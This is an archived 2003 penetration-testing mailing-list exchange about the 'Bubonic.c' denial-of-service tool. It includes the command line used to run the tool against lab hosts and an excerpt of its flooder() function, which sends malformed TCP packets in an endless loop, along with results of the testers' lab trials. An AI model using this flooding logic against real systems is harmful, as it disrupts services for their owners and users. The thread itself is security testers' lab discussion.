Hi Yonatan, Comments in-line > To sum up and simplify, this sends TCP packets with bad header. > As a result, my unpatched win2k's CPU graph stays over 90% > in the kernel, causing Albinoni to sound bad. I have tested thia again, it does collision but CPU is not going more than 5-8 percent. Thanking You. Sincerely, Indian Tiger, CISSP > -----Original Message----- > From: Yonatan Bokovza [mailto:Yonatanat_private] > Sent: Tuesday, March 11, 2003 3:40 PM > To: Indian Tiger; pen-testat_private > Cc: silat_private > Subject: RE: Bubonic DoS tool > > > > -----Original Message----- > > From: Indian Tiger [mailto:indiantigerat_private] > > Sent: Thursday, February 06, 2003 18:43 > > To: pen-testat_private > > Cc: silat_private > > Subject: Bubonic DoS tool > > > > > > Hi All, > > > > I was testing the "Bubonic.c lame DoS against Windows 2000 > > machines and > > certain versions of Linux in a test scenario over Linux 8.0. > > I have compiled > > it's source code and running it's binary as follows: > > # ./bubonic 10.3.10.22 10.3.8.70 100 1000 > > On executing the above command, there was no observable > > immediate effect, > > but the Hub was showing the collisions (which were the Red > > Steady). Etherial > > shows the packets routed to desination. > > But after executing the command the destination machine must be > > blocked/freeze, but it's not happening. > > The code is very easy to understand. The "interesting" part is > in flooder(), my comments inline: > > void flooder(void) > { > ... > packet.ip.ip_p = IPPROTO_TCP; > packet.ip.ip_tos = rand(); > ... > packet.tcp.th_flags = random(); > packet.tcp.th_win = 65535; > packet.tcp.th_seq = random(); > packet.tcp.th_ack = 0; > packet.tcp.th_off = 0; > packet.tcp.th_urp = random(); > packet.tcp.th_dport = random(); > ... > cksum.pseudo.ptcl = IPPROTO_TCP; > cksum.pseudo.tcpl = random(); > ... > for(i=0;;++i) { > ... > if (sendto(sock, &packet, sizeof(packet), 0, (struct > sockaddr *)&s_in, sizeof(s_in)) < 0); > } > } > > To sum up and simplify, this sends TCP packets with bad header. > As a result, my unpatched win2k's CPU graph stays over 90% > in the kernel, causing Albinoni to sound bad. > > Best Regards, > > Yonatan Bokovza > IT Security Consultant > Xpert Systems > ---------------------------------------------------------------------------- Are your vulnerability scans producing just another report? Manage the entire remediation process with StillSecure VAM's Vulnerability Repair Workflow. Download a free 15-day trial: http://www2.stillsecure.com/download/sf_vuln_list.html
This archive was generated by hypermail 2b30 : Tue Mar 11 2003 - 10:27:47 PST